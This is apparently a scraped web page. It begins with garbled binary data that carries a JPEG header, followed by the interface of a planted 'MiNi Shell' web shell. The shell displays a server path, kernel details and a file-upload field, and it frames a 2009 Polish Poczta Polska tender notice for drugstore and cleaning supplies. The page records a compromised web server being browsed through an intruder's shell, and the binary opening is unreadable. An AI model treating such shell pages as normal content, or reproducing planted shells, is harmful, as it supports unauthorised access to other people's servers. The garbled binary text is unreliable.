JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20091019/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20091019/180899-N-2009.html

<p class="kh_header"><b>Katowice: Dostawy artykułów drogeryjnych oraz chemii gospodarczej</b><br>
<b>Numer ogłoszenia: 180899 - 2009; data zamieszczenia: 19.10.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> "Poczta Polska Spółka Akcyjna" Centrum Infrastruktury Oddział Regionalny , pl. Oddziałów Młodzieży Powstańczej 7, 40-940 Katowice, woj. śląskie, tel. (032) 2538862, faks (032) 2513346.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.poczta-polska.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawy artykułów drogeryjnych oraz chemii gospodarczej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia są dostawy artykułów drogeryjnych oraz chemii gospodarczej.
2. Specyfikacja rodzajowo-ilościowa artykułów drogeryjnych oraz chemii gospodarczej, objętych przedmiotem zamówienia, zawarta jest w załączniku nr 1.
3. Dostarczone artykuły winny posiadać okres ważności wskazany przez producenta na opakowaniu i powinny być zdatne do użytku, nie krócej niż 6 miesięcy od daty dostawy.
4. Realizacja dostaw będzie się odbywać sukcesywnie w terminach wskazanych przez zamawiającego (nie częściej niż jeden raz na trzy miesiące), na podstawie zamówień przekazywanych przez poszczególne jednostki zamawiającego tj.:
1) Dział Zaopatrzenia i Administracji (ZORA) w Katowicach, pl. Oddziałów Młodzieży Powstańczej 7,
2) Wydział Operacyjny Infrastruktury (WOI) w Bielsku-Białej, ul. 1 Maja 2,
3) Wydział Operacyjny Infrastruktury (WOI) w Rybniku, ul. Pocztowa 2,
4) Wydział Operacyjny Infrastruktury (WOI) w Katowicach, ul. Pocztowa 9,
5) Wydział Operacyjny Infrastruktury (WOI) w Zabrzu, ul. Mielżyńskiego 5,
6) Wydział Operacyjny Infrastruktury (WOI) w Częstochowie, ul. Orzechowskiego 7,
7) Wydział Operacyjny Infrastruktury (WOI) w Będzinie, ul. Krasickiego 1,
8) Wydział Operacyjny Infrastruktury (WOI) w Opolu, ul. Krakowska 46,
9) Centrum Logistyki OR w Katowicach, ul. Rolna 46.
5. W wyjątkowych sytuacjach, np. podyktowanych nagłą potrzebą dodatkowej dostawy artykułów, których wcześniej nie można było przewidzieć, zamawiający zastrzega sobie prawo do złożenia dodatkowego zamówienia.
6. Zamawiający wymaga, aby dostawy były realizowane do następujących miejsc:
1) 40-940 Katowice, pl. Oddziałów Młodzieży Powstańczej 7,
2) 42-300 Bielsko-Biała, ul. 1 Maja 2,
3) 44-200 Rybnik, ul. Pocztowa 2,
4) 40-001 Katowice, ul. Pocztowa 1,
5) 41-850 Zabrze, ul. Mielżyńskiego 5,
6) 41-800 Zabrze, pl. Dworcowy 1,
7) 42-200 Częstochowa,  ul. Orzechowskiego 7,
8) 41-200 Sosnowiec, ul. Trzeciego Maja 24,
9) 45-076 Opole, ul. Krakowska 46,
10) 40-555 Katowice, ul. Rolna 7.
7. Każda zrealizowana dostawa winna być udokumentowana przez wykonawcę fakturą VAT. W celu potwierdzenia wydania towaru wykonawca zobowiązany będzie do wystawienia dokumentu WZ, który dołącza do każdej dostarczonej partii artykułów drogeryjnych oraz chemii gospodarczej.
8. Nieprzekraczalny termin realizacji dostawy każdej partii produktów zamawiający ustala na 4 dni robocze, od dnia dostarczenia zamówienia wykonawcy.
9. Dostawy i wyładunek artykułów odbywać się będą wyłącznie na koszt i ryzyko wykonawcy.
10. Zamawiający wymaga, aby dostarczany przez wykonawcę towar posiadał wymagane atesty PZH.
11. Dostawa konkretnego asortymentu i ilości artykułów następować będzie poprzez każdorazowe zamówienie żądanej ilości, pisemnie (przesyłką pocztową), poprzez faks lub pocztą elektroniczną, po wcześniejszym telefonicznym uzgodnieniu z wykonawcą. W przypadku braku możliwości skontaktowania się z wykonawcą za pomocą faksu lub drogą elektroniczną (np. z powodu wyłączenia lub awarii odpowiedniego urządzenia u wykonawcy), za czas zgłoszenia przyjmować się będzie czas wskazany przez zamawiającego. Zamawiający będzie określał w zapotrzebowaniu ilość i rodzaj artykułów.
12. Zamawiający nie jest zobowiązany do zamówienia towaru w pełnej ilości, określonej w załączniku nr 1. Zmniejszenie ilości zamawianego towaru nie może przekroczyć 20 % całości zamówienia. Z tego tytułu wykonawca nie będzie mógł wnosić jakichkolwiek roszczeń względem zamawiającego.
13. Zamawiający nie dopuszcza możliwości zmiany cen jednostkowych towaru w trakcie realizacji przedmiotu umowy.
14. Zamawiający wymaga, aby termin płatności faktury VAT wynosił 21 dni od daty jej otrzymania przez zamawiającego.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 33.74.10.00-6, 39.83.14.00-0, 39.81.30.00-4, 39.83.12.10-1.</p>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga, aby oferta była zabezpieczona wadium.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy: 1) posiadają wymagane uprawnienia do wykonywania działalności lub czynności w zakresie objętym przedmiotem zamówienia;
2) posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia; 3) znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia; 4) nie podlegają wykluczeniu
z postępowania o udzielenie zamówienia na podstawie art. 24 ust. 1 i art. 24 ust. 2 pkt 1-2 ustawy Prawo zamówień publicznych. Zamawiający dokona oceny spełniania w/w warunków, sprawdzając kompletność oraz poprawność złoSonych oświadczeń i dokumentów..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1) oświadczenie o spełnianiu warunków udziału w postępowaniu - zgodnie z załącznikiem nr 3. 2) aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w licytacji elektronicznej. 3) w celu potwierdzenia, że oferowane dostawy (artykuły chemii gospodarczej i drogeryjne) odpowiadają wymaganiom określonym przez zamawiającego w załączniku nr 1: opis artykułów podlegających wycenie - poprzez złożenie dokumentu (Wykazu artykułów, stanowiący załącznik nr 6) wskazującego nazwę i producenta wszystkich artykułów.
2. Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentu, o którym mowa w ust. 1 pkt 2, składa dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzający, że nie otwarto jego likwidacji ani nie ogłoszono
upadłości. 3. W przypadku wniosku składanego przez dwa i więcej podmiotów (np. konsorcjum wykonawców, spółka cywilna), każdy podmiot z osobna zobowiązany jest do przedłożenia dokumentów, wystawionych indywidualnie na ten podmiot, określonych w ust. 2. Wymagane oświadczenie podmioty te mogą złożyć wspólnie. 4. Brak któregokolwiek z dokumentów określonych w ust. 1 pkt 1-2 spowoduje
wykluczenie wykonawcy z postępowania o udzielenie niniejszego zamówienia - art. 24 ust. 2 pkt 3, z zastrzeżeniem art. 26 ust. 3 ustawy Prawo zamówień publicznych. 5. Wymagane dokumenty - zgodnie z obowiązującym w tym zakresie Rozporządzeniem Prezesa Rady Ministrów z dnia 19 maja 2006 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane (Dz.U. z 2006 nr 87 poz. 605 ze zmianami) - powinny być złożone w formie oryginału lub kserokopii poświadczonych za zgodność z oryginałem przez wykonawcę. Należy na kserokopii zamieścić zapis, np.: za zgodność kopii z oryginałem, potwierdzam zgodność kopii z oryginałem oraz datę i podpis (parafa) opatrzony imienną pieczątką lub czytelny podpis składający się z pełnego imienia i nazwiska. 6. W przypadku, gdy wykonawcy nie złożą wraz z wnioskiem oświadczeń i dokumentów potwierdzających spełnienie warunków udziału w postępowaniu lub którzy nie złożą pełnomocnictw, albo którzy złożą wymagane przez zamawiającego oświadczenia i dokumenty, zawierające błędy lub złożą wadliwe pełnomocnictwa, zamawiający wezwie wykonawców do ich złożenia w określonym w wezwaniu terminie, chyba że konieczne byłoby unieważnienie postępowania - art. 26 ust. 3 ustawy. 7. Wykonawca ma obowiązek złożenia dokumentów i oświadczeń rzetelnych oraz potwierdzających prawdę pod rygorem odpowiedzialności karnej z art. 297 ustawy z dnia 6 czerwiec 1997 r. Kodeks karny (Dz.U. Nr 88, poz. 553, ze zmianami)..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> licytacja elektroniczna.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.6) Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:</b> http://licytacje.uzp.gov.pl</p>
<p><b>IV.3.7) Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:</b> http://www.poczta-polska.pl/O_Firmie/?d=przetargi, pozycja 09-1995</p>
<p><b>IV.3.8) Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:</b> 1. Wymagania formalne: 1) Z platformy w pełnym zakresie mogą korzystać wyłącznie wykonawcy zarejestrowani w systemie pod adresem http://licytacje.uzp.gov.pl. 2) Wykonawca, aby umożliwić zamawiającemu dopuszczenie go do udziału w licytacji, winien zarejestrować się w systemie dostępnym na stronie http://licytacje.uzp.gov.pl (jeżeli nie jest jeszcze zarejestrowanym użytkownikiem), a wraz z wnioskiem o dopuszczenie do udziału w licytacji elektronicznej (załącznik nr 2) winien przekazać zamawiającemu informację o swoim loginie.
2. Wymagania techniczne: Komputer klasy PC (lub równoważnej) spełniający wymogi techniczne określone przez producentów przeglądarek internetowych Ms Internet Explorer w wersji 6.0 lub wyższej albo Mozilla Firefox w wersji 2.0 lub wyższej, z zainstalowaną jedną z w/w przeglądarek lub przeglądarką równoważną, podłączony do sieci Internet..</p>
<p><b>IV.3.9) Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:</b> 1. Przedmiotowa licytacja elektroniczna będzie licytacją jednoetapową.
2. W toku licytacji elektronicznej wykonawcy składają kolejne korzystniejsze postąpienia. Możliwość złożenia postąpienia istnieje od otwarcia licytacji do jej zamknięcia.
3. Oferta złożona w toku licytacji przestaje wiązać, gdy inny wykonawca złożył ofertę korzystniejszą.
4. W toku licytacji wykonawcy proponują rzeczywistą cenę oferty (brutto) wyrażoną w złotych, z dokładnością do jednego grosza, przy czym wartość cyfrową groszy należy oddzielić od wartości cyfrowej złotych kropką.
5. Oferta złożona przez wykonawcę winna być korzystniejsza od najniższej oferty, co najmniej o kwotę minimalnego postąpienia.
6. W toku licytacji zamawiający za pośrednictwem platformy licytacyjnej na bieżąco będzie przekazywał wszystkim wykonawcom informacje o pozycji złożonych przez nich ofert, liczbie wykonawców biorących udział w licytacji elektronicznej, a także o cenach złożonych ofert, z tym że do momentu zamknięcia licytacji nie ujawni informacji umożliwiających identyfikację wykonawców.
7. Zamawiający udzieli zamówienia wykonawcy, który zaoferuje najniższą cenę..</p>
<p><b>IV.3.10) Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania:</b><br>
<ul class="kh_indent_1"><li>
<table>
<tr><td style="font-size: 10pt;"><b>etap nr</b></td><td width="20px;"><td style="font-size: 10pt;"><b>czas trwania etapu</b></td></tr>
<tr><td valign="top" style="font-size: 10pt;">1</td><td></td><td style="font-size: 10pt;">Upływa w dniu otwarcia, o godzinie 10:45</td></tr>
</table></li></ul>
<p><b>Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną <i>zakwalifikowani</i> do następnego etapu?</b> nie.</p>
<p><b>IV.3.11) Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej:</b> 28.10.2009 godzina 11:00, miejsce: pl. Oddziałów Młodzieży Powstańczej 7, 40-940 Katowice, pokój nr 407..</p>
<p><b>IV.3.12) Termin otwarcia licytacji elektronicznej:</b> 7 dni po terminie przekazania zaproszeń, o godzinie 10:00..</p>
<p><b>Termin zamknięcia licytacji elektronicznej:</b> Upływa w dniu otwarcia, o godzinie 10:45..</p>
<p><b>Warunki zamknięcia licytacji elektronicznej:</b> Zamawiający zamyka licytację w dniu jej otwarcia, o godzinie 10:45..</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com